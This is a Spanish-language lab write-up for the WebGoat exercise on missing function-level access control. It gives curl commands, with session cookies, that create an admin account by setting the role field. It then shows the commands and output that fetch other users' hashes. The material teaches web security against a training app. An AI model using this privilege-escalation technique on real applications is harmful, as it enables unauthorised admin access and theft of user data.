# Introducción a la Ciberseguridad - Vulnerabilidad A5 Missing Function Level Access Control (Apartado 3)

Conociendo el endpoint [*http://127.0.0.1:8080/WebGoat/users*](http://127.0.0.1:8080/WebGoat/users) se puede intentar crear un usuario administrador utilizando el verbo *POST*:

```bash
COOKIE=JSESSIONID=RN-qv0Kh8is9SKDTrfr4CGhtIJBiOAndhPDQXYgF
curl -X POST -H "Content-Type: application/json" --cookie $COOKIE \
  --data '{"username":"godmode","password":"godmode","matchingPassword":"godmode","role":"WEBGOAT_ADMIN"}' \
  http://127.0.0.1:8080/WebGoat/users

```

![Missing Function Level Access Control, Create Admin User](./img/01-a5_mflac_03.gif)

Después de crear el usuario administrador se puede:

* Entrar en la página web utilizando las credenciales del usuario administrador creado.
* Obtener la *cookie* de la sesión de alguna petición.
* Hacer la petición para obtener la información de los usuarios en el endpoint [*http://127.0.0.1:8080/WebGoat/users*](http://127.0.0.1:8080/WebGoat/users).

```bash
COOKIE=JSESSIONID=WJWMCktSngIplwrHusJr_Y4xoUDJkVA3l8xpKv86
curl -H "Content-Type: application/json" --cookie $COOKIE http://127.0.0.1:8080/WebGoat/users
```

El resultado es la información de los usuarios:

```json
[{
  "username": "godmode",
  "admin": true,
  "userHash": "iiUBbUh5vc70CkzpcoBnvhndIQBErZohcGNUjlLkCeY="
}, {
  "username": "ureure",
  "admin": false,
  "userHash": "kGoL6O/tndSkmCnGR/Rl061Q97aeA40TYSPlEEbiRKI="
}]
```

![Missing Function Level Access Control, Get Users Information](./img/02-a5_mflac_03.gif)

Con la *hash* obtenida se puede volver a iniciar sesión con nuestro usuario e introducir el resultado "kGoL6O/tndSkmCnGR/Rl061Q97aeA40TYSPlEEbiRKI=" en el formulario:

![Missing Function Level Access Control, Validate Hash Result](./img/03-a5_mflac_03.gif)
